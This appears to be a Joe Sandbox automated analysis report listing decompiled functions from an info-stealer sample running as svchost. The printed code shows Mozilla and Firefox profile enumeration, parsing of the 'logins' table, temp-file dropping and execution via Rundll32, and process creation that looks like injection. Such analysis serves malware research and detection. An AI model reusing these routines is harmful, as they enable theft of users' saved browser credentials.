                                                                                                                                        • Opcode ID: a3aebacc5fe886e5daaf2d12baefe3988e323301630a4f1443627dca083b1fae
                                                                                                                                        • Instruction ID: f13a7a93b88228d76f90baa43efec095f4afbf0aa1e0b104d60f8e9bc83cedd9
                                                                                                                                        • Opcode Fuzzy Hash: a3aebacc5fe886e5daaf2d12baefe3988e323301630a4f1443627dca083b1fae
                                                                                                                                        • Instruction Fuzzy Hash: 6A1121AAC045997DAB61C7E68C41EFEBBFCDE0D181F140096B690E1486D63DD700EB35
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.06%

                                                                                                                                        Function 02443360, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E02443360(CHAR* _a4) {
				intOrPtr _v8;
				long _v12;
				char _v272;
				char _v532;
				int _t17;
				intOrPtr _t19;

				 *_a4 = 0;
				_v12 = 0x104;
				_t17 = GetComputerNameA( &_v272,  &_v12);
				_t34 = _t17 - 1;
				if(_t17 == 1) {
					lstrcatA(_a4,  &_v272);
				}
				lstrcatA(_a4, " @ ");
				_v8 = 0;
				_t19 = E02443050(_t34,  &_v532); // executed
				_v8 = _t19;
				if(_v8 == 1) {
					lstrcatA(_a4,  &_v532);
				}
				return 1;
			}









                                                                                                                                        0x02443374
                                                                                                                                        0x02443378
                                                                                                                                        0x0244338a
                                                                                                                                        0x02443390
                                                                                                                                        0x02443393
                                                                                                                                        0x024433a0
                                                                                                                                        0x024433a0
                                                                                                                                        0x024433af
                                                                                                                                        0x024433b5
                                                                                                                                        0x024433c3
                                                                                                                                        0x024433cb
                                                                                                                                        0x024433d2
                                                                                                                                        0x024433df
                                                                                                                                        0x024433df
                                                                                                                                        0x024433ed

                                                                                                                                        APIs
                                                                                                                                        • GetComputerNameA.KERNEL32(?,00000104), ref: 0244338A
                                                                                                                                        • lstrcatA.KERNEL32(00000104,?), ref: 024433A0
                                                                                                                                        • lstrcatA.KERNEL32(00000104, @ ), ref: 024433AF
                                                                                                                                        • lstrcatA.KERNEL32(00000104,?), ref: 024433DF
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.705841098.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2440000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrcat$ComputerName
                                                                                                                                        • String ID: @
                                                                                                                                        • API String ID: 2583549208-203157567
                                                                                                                                        • Opcode ID: 9dfd1d94941f88fba2d985cd71fd435ddd5efe2c7ed03efc9f560a2c74d3726b
                                                                                                                                        • Instruction ID: af1aec7092e6b998ed8170512b4a81c4b5fcc7e27c4c5e611493dfa7630df07e
                                                                                                                                        • Opcode Fuzzy Hash: 9dfd1d94941f88fba2d985cd71fd435ddd5efe2c7ed03efc9f560a2c74d3726b
                                                                                                                                        • Instruction Fuzzy Hash: 6C0184B990020CABEB14DFE4D989BDE7BB9EB44300F104999E60587240DBB5EB94CF91
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.67%

                                                                                                                                        Function 100078D5, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E100078D5(void* __ebx, void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				char _v269;
				void* _t18;
				void* _t19;
				void* _t20;

				_t20 = __eflags;
				_t19 = __edx;
				_t18 = __ecx;
				_v8 = E100015A9(_a4, 0x28, 0);
				 *0x10010155 = 0;
				GetCurrentDirectoryA(0x104,  &_v269);
				E10007690(_t18, _a4,  *0x1000f159, "Software\\Mozilla", "Mozilla", "\\Mozilla\\Profiles\\"); // executed
				E10007690(_t18, _a4, 0x80000002, "Software\\Mozilla", "Mozilla", "\\Mozilla\\Profiles\\"); // executed
				SetCurrentDirectoryA( &_v269);
				return E100015EF(__ebx, _t18, _t19, _t20, _a4, _v8);
			}








                                                                                                                                        0x100078d5
                                                                                                                                        0x100078d5
                                                                                                                                        0x100078d5
                                                                                                                                        0x100078ea
                                                                                                                                        0x100078ed
                                                                                                                                        0x10007903
                                                                                                                                        0x10007920
                                                                                                                                        0x1000793c
                                                                                                                                        0x10007948
                                                                                                                                        0x10007959

                                                                                                                                        APIs
                                                                                                                                        • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 10007903
                                                                                                                                          • Part of subcall function 10007690: StrStrIA.SHLWAPI(?,?), ref: 1000769C
                                                                                                                                          • Part of subcall function 10007690: RegOpenKeyA.ADVAPI32(?,?,?), ref: 10007713
                                                                                                                                          • Part of subcall function 10007690: RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 1000773F
                                                                                                                                          • Part of subcall function 10007690: RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 10007787
                                                                                                                                        • SetCurrentDirectoryA.KERNEL32(?,?), ref: 10007948
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CurrentDirectory$CloseEnumOpen
                                                                                                                                        • String ID: Mozilla$Software\Mozilla$\Mozilla\Profiles\
                                                                                                                                        • API String ID: 3062143572-2716603926
                                                                                                                                        • Opcode ID: c057c88f2d520d1c576ca8cc4073e0ce17c0505d5f2f6d5b8c8518f044ecd356
                                                                                                                                        • Instruction ID: 5c5a7032acf471a97e8589268f1e058c246f32595776fcaf8fb448fa49966ad2
                                                                                                                                        • Opcode Fuzzy Hash: c057c88f2d520d1c576ca8cc4073e0ce17c0505d5f2f6d5b8c8518f044ecd356
                                                                                                                                        • Instruction Fuzzy Hash: F0F06D35A00508FAEF00EFA0CC4AFC87A68EB14380F404010F7487C166DBB5EA90DA41
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.06%

                                                                                                                                        Function 10007798, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E10007798(void* __ebx, void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				char _v269;
				void* _t18;
				void* _t19;
				void* _t20;

				_t20 = __eflags;
				_t19 = __edx;
				_t18 = __ecx;
				_v8 = E100015A9(_a4, 0x24, 0);
				 *0x10010155 = 0;
				GetCurrentDirectoryA(0x104,  &_v269);
				E10007690(_t18, _a4,  *0x1000f159, "Software\\Mozilla", "Firefox", "\\Mozilla\\Firefox\\"); // executed
				E10007690(_t18, _a4, 0x80000002, "Software\\Mozilla", "Firefox", "\\Mozilla\\Firefox\\"); // executed
				SetCurrentDirectoryA( &_v269);
				return E100015EF(__ebx, _t18, _t19, _t20, _a4, _v8);
			}








                                                                                                                                        0x10007798
                                                                                                                                        0x10007798
                                                                                                                                        0x10007798
                                                                                                                                        0x100077ad
                                                                                                                                        0x100077b0
                                                                                                                                        0x100077c6
                                                                                                                                        0x100077e3
                                                                                                                                        0x100077ff
                                                                                                                                        0x1000780b
                                                                                                                                        0x1000781c

                                                                                                                                        APIs
                                                                                                                                        • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 100077C6
                                                                                                                                          • Part of subcall function 10007690: StrStrIA.SHLWAPI(?,?), ref: 1000769C
                                                                                                                                          • Part of subcall function 10007690: RegOpenKeyA.ADVAPI32(?,?,?), ref: 10007713
                                                                                                                                          • Part of subcall function 10007690: RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 1000773F
                                                                                                                                          • Part of subcall function 10007690: RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 10007787
                                                                                                                                        • SetCurrentDirectoryA.KERNEL32(?,?), ref: 1000780B
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CurrentDirectory$CloseEnumOpen
                                                                                                                                        • String ID: Firefox$Software\Mozilla$\Mozilla\Firefox\
                                                                                                                                        • API String ID: 3062143572-2631691096
                                                                                                                                        • Opcode ID: 69380712fedf0d909aead7f667b2d3bf459bb761e2c57761879b42df2d2827bc
                                                                                                                                        • Instruction ID: 3ab3e9d299f7e720ac3b5f374585deef011e195cefbe90e33e1ea0ca3ee9814c
                                                                                                                                        • Opcode Fuzzy Hash: 69380712fedf0d909aead7f667b2d3bf459bb761e2c57761879b42df2d2827bc
                                                                                                                                        • Instruction Fuzzy Hash: 99F03A34A40508FEEB10DF94CC8AFCD3A69EB58384F404050F788BD1A7DBF5EA909A55
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.05%

                                                                                                                                        Function 1000178E, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69UNIQUE
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 88%
                                                                                                                                        			E1000178E(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* __ebx;
				void* __ebp;
				void* _t27;
				signed int _t41;
				signed int _t42;
				signed int _t45;

				_t49 = __edx;
				_t45 = 0;
				_t27 =  &_v8;
				_push(_t27);
				_push(_a4);
				L1000BA64();
				if(_t27 >= 0) {
					_v16 = E10001091(_t27, 0, __edx, _a4);
					_t27 = GlobalLock(_v8);
					if(_t27 != 0) {
						_v20 = _t27;
						_v24 = E10001888(E1000D122() + 0x500000);
						_v28 = E10001888(E1000D128(_v16) + 0x100000);
						_v12 = E1000D136(_v20, _v28, _v16, _v24, 0, _v16);
						E10001356(GlobalUnlock(_v8), _t49, _a4);
						_t41 = E10001537(_a4, "PKDFILE0YUICRYPTED0YUI1.0", 8);
						_t42 = E10001522(_a4, _v16);
						_t45 = _t41 & _t42 & E10001558(_a4, _v28, _v12);
						E10001871(_v24); // executed
						_t27 = E10001871(_v28); // executed
					}
				}
				E100012C2(_t27, _t49, _a4);
				return _t45;
			}















                                                                                                                                        0x1000178e
                                                                                                                                        0x10001795
                                                                                                                                        0x10001797
                                                                                                                                        0x1000179a
                                                                                                                                        0x1000179b
                                                                                                                                        0x1000179e
                                                                                                                                        0x100017a5
                                                                                                                                        0x100017b3
                                                                                                                                        0x100017be
                                                                                                                                        0x100017c0
                                                                                                                                        0x100017c6
                                                                                                                                        0x100017df
                                                                                                                                        0x100017f8
                                                                                                                                        0x10001811
                                                                                                                                        0x1000181f
                                                                                                                                        0x1000182e
                                                                                                                                        0x1000183b
                                                                                                                                        0x10001850
                                                                                                                                        0x10001855
                                                                                                                                        0x1000185d
                                                                                                                                        0x1000185d
                                                                                                                                        0x100017c0
                                                                                                                                        0x10001865
                                                                                                                                        0x1000186e

                                                                                                                                        APIs
                                                                                                                                        • GetHGlobalFromStream.OLE32(?,?), ref: 1000179E
                                                                                                                                        • GlobalLock.KERNEL32 ref: 100017B9
                                                                                                                                          • Part of subcall function 10001888: LocalAlloc.KERNEL32(00000040,-00000080,?,10002A53,?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 10001896
                                                                                                                                        • GlobalUnlock.KERNEL32(?,?,?,?,?,-00100000,-00500000), ref: 10001817
                                                                                                                                          • Part of subcall function 10001871: LocalFree.KERNEL32(00000000,?,10002A7A,00000000,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00000000,00000000,00000000), ref: 1000187D
                                                                                                                                        Strings
                                                                                                                                        • PKDFILE0YUICRYPTED0YUI1.0, xrefs: 10001826
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Global$Local$AllocFreeFromLockStreamUnlock
                                                                                                                                        • String ID: PKDFILE0YUICRYPTED0YUI1.0
                                                                                                                                        • API String ID: 1329788818-258907703
                                                                                                                                        • Opcode ID: d2e2b1e2c0e86b9c7621bf4f1e43991d9492bae71a4490d4755ae812cd725422
                                                                                                                                        • Instruction ID: 014b971cb4d958fd93ff8857645bedbef4dad2c89e54b6919e2ad1157fae85fe
                                                                                                                                        • Opcode Fuzzy Hash: d2e2b1e2c0e86b9c7621bf4f1e43991d9492bae71a4490d4755ae812cd725422
                                                                                                                                        • Instruction Fuzzy Hash: 2E21DEBAD00509BFEF019FA0CC42AED7E76EF14380F508071BA1065165EB72AB61AB91
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 100.00%

                                                                                                                                        Function 02443050, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53stringUNIQUE
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E02443050(void* __eflags, CHAR* _a4) {
				long _v8;
				intOrPtr _v12;
				long _v16;
				long _v20;
				char _v280;
				char _v540;
				long _t21;
				intOrPtr _t24;

				_v20 = 0x104;
				_v16 = 0x104;
				 *_a4 = 0;
				_t21 = E02443100("explorer.exe"); // executed
				_v8 = _t21;
				if(_v8 != 0xffffffff) {
					_v12 = 0;
					_t24 = E02443270(_v8,  &_v540, _v20,  &_v280, _v16); // executed
					_v12 = _t24;
					if(_v12 != 1) {
						return 0;
					}
					lstrcpyA(_a4,  &_v280);
					lstrcatA(_a4, "\\");
					lstrcatA(_a4,  &_v540);
					return 1;
				}
				return 0;
			}











                                                                                                                                        0x02443059
                                                                                                                                        0x02443060
                                                                                                                                        0x02443072
                                                                                                                                        0x0244307b
                                                                                                                                        0x02443083
                                                                                                                                        0x0244308a
                                                                                                                                        0x02443090
                                                                                                                                        0x024430b1
                                                                                                                                        0x024430b9
                                                                                                                                        0x024430c0
                                                                                                                                        0x00000000
                                                                                                                                        0x024430fa
                                                                                                                                        0x024430cd
                                                                                                                                        0x024430dc
                                                                                                                                        0x024430ed
                                                                                                                                        0x00000000
                                                                                                                                        0x024430f3
                                                                                                                                        0x00000000

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 02443100: EnumProcesses.PSAPI(?,00001000,?,?,02443080,explorer.exe), ref: 0244311D
                                                                                                                                        • lstrcpyA.KERNEL32(00000001,?), ref: 024430CD
                                                                                                                                        • lstrcatA.KERNEL32(00000001,02444298), ref: 024430DC
                                                                                                                                        • lstrcatA.KERNEL32(00000001,?), ref: 024430ED
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.705841098.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2440000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrcat$EnumProcesseslstrcpy
                                                                                                                                        • String ID: explorer.exe
                                                                                                                                        • API String ID: 424215357-3187896405
                                                                                                                                        • Opcode ID: 276635520a2788aaeaf6f6c0f1c145be33982896dca7376ab7978f74c890e473
                                                                                                                                        • Instruction ID: 0a654217cd356744d70fde18975de9e6ed44fb7aa35a24ed8a9cff3a78ea5026
                                                                                                                                        • Opcode Fuzzy Hash: 276635520a2788aaeaf6f6c0f1c145be33982896dca7376ab7978f74c890e473
                                                                                                                                        • Instruction Fuzzy Hash: 651154B5D00208EBEF14DFE8D949BDE7BB8AB09700F108699E60597240DB74A685CF91
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 100.00%

                                                                                                                                        Function 02443C80, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53UNIQUE
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 88%
                                                                                                                                        			E02443C80(void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				char _v264;
				char _v524;
				char _v784;
				void* _t17;
				void* _t21;

				GetTempPathA(0x104,  &_v524);
				GetTempFileNameA( &_v524, "BN", 0,  &_v264); // executed
				_t17 = E02443C10(_a4,  &_v264, _a4, _a8); // executed
				if(_t17 != 1) {
					return 0;
				}
				_push(_a8);
				if(E02443650(_a4) != 1) {
					_t21 = E02443940( &_v264); // executed
					return _t21;
				}
				wsprintfA( &_v784, "Rundll32.exe %s,f1",  &_v264);
				return E02443940( &_v784);
			}








                                                                                                                                        0x02443c95
                                                                                                                                        0x02443cb0
                                                                                                                                        0x02443cc5
                                                                                                                                        0x02443cd0
                                                                                                                                        0x00000000
                                                                                                                                        0x02443d27
                                                                                                                                        0x02443cd5
                                                                                                                                        0x02443ce5
                                                                                                                                        0x02443d1d
                                                                                                                                        0x00000000
                                                                                                                                        0x02443d22
                                                                                                                                        0x02443cfa
                                                                                                                                        0x00000000

                                                                                                                                        APIs
                                                                                                                                        • GetTempPathA.KERNEL32(00000104,?), ref: 02443C95
                                                                                                                                        • GetTempFileNameA.KERNEL32(?,024442A0,00000000,?), ref: 02443CB0
                                                                                                                                          • Part of subcall function 02443C10: CreateFileA.KERNEL32(02442789,40000000,00000000,00000000,00000002,00000080,00000000,02442789), ref: 02443C36
                                                                                                                                          • Part of subcall function 02443C10: WriteFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 02443C57
                                                                                                                                          • Part of subcall function 02443C10: CloseHandle.KERNEL32(000000FF), ref: 02443C61
                                                                                                                                        • wsprintfA.USER32 ref: 02443CFA
                                                                                                                                          • Part of subcall function 02443940: CreateProcessA.KERNEL32 ref: 02443977
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.705841098.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2440000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$CreateTemp$CloseHandleNamePathProcessWritewsprintf
                                                                                                                                        • String ID: Rundll32.exe %s,f1
                                                                                                                                        • API String ID: 130250823-1406688557
                                                                                                                                        • Opcode ID: 8fbdaed9970282f109c286b7914d494174aa1fdfa446688a63999217d70109f7
                                                                                                                                        • Instruction ID: df70c322c07928053996e5bcfdeb59ed976458aa9e0d36252f513a4807012baa
                                                                                                                                        • Opcode Fuzzy Hash: 8fbdaed9970282f109c286b7914d494174aa1fdfa446688a63999217d70109f7
                                                                                                                                        • Instruction Fuzzy Hash: 001169FA8002186BFB24DF50EC85FEA777DAB54B00F1045D5FA0996141EA71AB988F91
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 100.00%

                                                                                                                                        Function 10001C46, Relevance: 6.1, APIs: 4, Instructions: 87registryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 90%
                                                                                                                                        			E10001C46(void* _a4, char* _a8, char* _a12, int** _a16, intOrPtr _a20) {
				void* _v8;
				int _v12;
				int _v16;
				int** _t28;
				long _t30;
				char* _t33;
				void* _t36;
				long _t39;
				long _t46;
				signed int _t51;
				char* _t53;

				_t28 = _a16;
				if(_t28 != 0) {
					 *_t28 = 0;
				}
				_t53 = 0;
				if(_a20 != 1) {
					if(_a20 != 2) {
						_t51 = 0;
					} else {
						_t51 = 0x100;
					}
				} else {
					_t51 = 0x200;
				}
				_t30 = RegOpenKeyExA(_a4, _a8, 0, _t51 | 0x00020019,  &_v8); // executed
				if(_t30 == 0) {
					_t39 = RegQueryValueExA(_v8, _a12, 0,  &_v16, 0,  &_v12); // executed
					if(_t39 == 0 && _v12 != 0 && (_v16 != 1 || _v12 != 1)) {
						_t53 = E10001888(_v12 + 1);
						_t46 = RegQueryValueExA(_v8, _a12, 0, 0, _t53,  &_v12); // executed
						if(_t46 == 0) {
							if(_a16 != 0) {
								_push(_v12);
								_pop( *__eax);
							}
						} else {
							E10001871(_t53);
							_t53 = 0;
						}
					}
					RegCloseKey(_v8); // executed
				}
				_t33 = _t53;
				if(_t33 != 0 || _a20 >= 2) {
					return _t33;
				} else {
					_t36 = E10001C46(_a4, _a8, _a12, _a16, _a20 + 1); // executed
					return _t36;
				}
			}














                                                                                                                                        0x10001c50
                                                                                                                                        0x10001c52
                                                                                                                                        0x10001c54
                                                                                                                                        0x10001c54
                                                                                                                                        0x10001c5a
                                                                                                                                        0x10001c60
                                                                                                                                        0x10001c6d
                                                                                                                                        0x10001c76
                                                                                                                                        0x10001c6f
                                                                                                                                        0x10001c6f
                                                                                                                                        0x10001c6f
                                                                                                                                        0x10001c62
                                                                                                                                        0x10001c62
                                                                                                                                        0x10001c62
                                                                                                                                        0x10001c8b
                                                                                                                                        0x10001c92
                                                                                                                                        0x10001ca6
                                                                                                                                        0x10001cad
                                                                                                                                        0x10001ccb
                                                                                                                                        0x10001cdc
                                                                                                                                        0x10001ce3
                                                                                                                                        0x10001cf4
                                                                                                                                        0x10001cf6
                                                                                                                                        0x10001cf9
                                                                                                                                        0x10001cf9
                                                                                                                                        0x10001ce5
                                                                                                                                        0x10001ce6
                                                                                                                                        0x10001ceb
                                                                                                                                        0x10001ceb
                                                                                                                                        0x10001ce3
                                                                                                                                        0x10001cfe
                                                                                                                                        0x10001cfe
                                                                                                                                        0x10001d05
                                                                                                                                        0x10001d07
                                                                                                                                        0x10001d27
                                                                                                                                        0x10001d0f
                                                                                                                                        0x10001d20
                                                                                                                                        0x00000000
                                                                                                                                        0x10001d20

                                                                                                                                        APIs
                                                                                                                                        • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 10001C8B
                                                                                                                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,?,00000000,?,?), ref: 10001CA6
                                                                                                                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000,00000001,?,?,00000000,?,00000000,?,?,?,00000000), ref: 10001CDC
                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,00000000,?,00000000,?,?,?,00000000,?,?), ref: 10001CFE
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: QueryValue$CloseOpen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1586453840-0
                                                                                                                                        • Opcode ID: 0f25478ef340ae590cc18262efe93c4c9f14ad30b0b6321c26add42bfb7f1cf4
                                                                                                                                        • Instruction ID: 20b426dc677a55785aa396109236163a75eac4ea1cea175ba46e60eb4feeac1b
                                                                                                                                        • Opcode Fuzzy Hash: 0f25478ef340ae590cc18262efe93c4c9f14ad30b0b6321c26add42bfb7f1cf4
                                                                                                                                        • Instruction Fuzzy Hash: C8213972A4050AEEFF11CE94CD46FEE7ABAEB453C0F104025F91096098D731DE51DB51
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.05%

                                                                                                                                        Function 100092B6, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 87stringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 90%
                                                                                                                                        			E100092B6(void* __ebx, void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				char _v8;
				char _v12;
				CHAR* _v16;
				CHAR* _v20;
				intOrPtr _v24;
				char _v28;
				int _t35;
				void* _t52;
				void* _t54;

				_t54 = __ecx;
				if(_a16 == 5) {
					_t35 = E10008860(_a12, 2,  &_v8,  &_v12,  &_v16);
					if(_v12 == 1) {
						_push(_v16);
						_pop( *_t8);
						_t35 = lstrcmpiA(_v20, "logins");
						if(_t35 == 0) {
							_t35 = E10008860(_a12, 0,  &_v8,  &_v12,  &_v16);
							if(_v12 == 1) {
								_t35 = lstrcmpA("table", _v16);
								if(_t35 == 0) {
									_t35 = E10008860(_a12, 3,  &_v8,  &_v12,  &_v16);
									if(_v12 == 0) {
										 *_t22 =  *_v16;
										_t35 = E10008860(_a12, 4,  &_v8,  &_v12,  &_v16);
										if(_v12 == 1) {
											 *0x10012e8c = 0xffffffff;
											 *0x10012e90 = 0xffffffff;
											 *0x10012e94 = 0xffffffff;
											_t35 = E10008D4F(_v16, E10009028);
											_v28 = 1;
											if( *0x10012e8c != 0xffffffff &&  *0x10012e90 != 0xffffffff &&  *0x10012e94 != 0xffffffff) {
												_t52 = E10008A44(__ebx, _t54, _a4, _a8, _v24,  &_v28, _a20, E100090E3); // executed
												return _t52;
											}
										}
									}
								}
							}
						}
					}
				}
				return _t35;
			}












                                                                                                                                        0x100092b6
                                                                                                                                        0x100092c0
                                                                                                                                        0x100092d7
                                                                                                                                        0x100092e0
                                                                                                                                        0x100092e6
                                                                                                                                        0x100092e9
                                                                                                                                        0x100092f9
                                                                                                                                        0x100092fb
                                                                                                                                        0x10009312
                                                                                                                                        0x1000931b
                                                                                                                                        0x1000932e
                                                                                                                                        0x10009330
                                                                                                                                        0x10009347
                                                                                                                                        0x10009350
                                                                                                                                        0x1000935b
                                                                                                                                        0x1000936f
                                                                                                                                        0x10009378
                                                                                                                                        0x1000937a
                                                                                                                                        0x10009384
                                                                                                                                        0x1000938e
                                                                                                                                        0x100093a0
                                                                                                                                        0x100093a5
                                                                                                                                        0x100093b3
                                                                                                                                        0x100093dc
                                                                                                                                        0x00000000
                                                                                                                                        0x100093dc
                                                                                                                                        0x100093b3
                                                                                                                                        0x10009378
                                                                                                                                        0x10009350
                                                                                                                                        0x10009330
                                                                                                                                        0x1000931b
                                                                                                                                        0x100092fb
                                                                                                                                        0x100092e0
                                                                                                                                        0x100093e2

                                                                                                                                        APIs
                                                                                                                                        • lstrcmpiA.KERNEL32(00000000,logins,?), ref: 100092F4
                                                                                                                                        • lstrcmpA.KERNEL32(table,?,00000000,logins,?), ref: 10009329
                                                                                                                                          • Part of subcall function 10008D4F: StrStrIA.SHLWAPI(?,() ), ref: 10008D5F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrcmplstrcmpi
                                                                                                                                        • String ID: logins$table
                                                                                                                                        • API String ID: 3524194181-3800951466
                                                                                                                                        • Opcode ID: 44d694fdf6dd57517d6ea00e6883bb3cd1586d680de51ed0ae053e5ddceef0b7
                                                                                                                                        • Instruction ID: 6104885e12e3212c77871138721ef28eef4c075ae9b00afc7210a2fe4d4bc1eb
                                                                                                                                        • Opcode Fuzzy Hash: 44d694fdf6dd57517d6ea00e6883bb3cd1586d680de51ed0ae053e5ddceef0b7
                                                                                                                                        • Instruction Fuzzy Hash: 2E31C37680060EFEEF11CF91CC81ADE7BB9EB053A4F108262F661A10E4D7719BA49B51
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.05%

                                                                                                                                        Function 02442DC0, Relevance: 6.1, APIs: 4, Instructions: 72COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E02442DC0(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				void* _v8;
				long _v12;
				int _v16;
				int _v20;
				void* _v24;
				char _v28;
				char _v32;
				void* _t30;
				int _t33;
				int _t40;
				long _t42;

				_v12 = 0xffffffff;
				if(E02442D80(__ecx, _a4) != 0) {
					_t30 = E02442E90( &_v8,  &_v24); // executed
					if(_t30 != 0) {
						_v16 = 0;
						_t33 = E024434F0(_v8, _a4, _a8,  &_v32,  &_v28); // executed
						_v16 = _t33;
						if(_v16 == 1) {
							_v20 = 0;
							_t40 = E02443A60(_v8, _v24, _v32, _v28); // executed
							_v20 = _t40;
							if(_v20 == 1) {
								_t42 = GetProcessId(_v8); // executed
								_v12 = _t42;
							}
						}
						if(_v12 == 0xffffffff) {
							TerminateProcess(_v8, 0);
						}
						CloseHandle(_v24);
						CloseHandle(_v8);
						return _v12;
					}
					return _v12;
				}
				return 0;
			}














                                                                                                                                        0x02442dc6
                                                                                                                                        0x02442ddb
                                                                                                                                        0x02442dec
                                                                                                                                        0x02442df6
                                                                                                                                        0x02442e00
                                                                                                                                        0x02442e1b
                                                                                                                                        0x02442e23
                                                                                                                                        0x02442e2a
                                                                                                                                        0x02442e2c
                                                                                                                                        0x02442e43
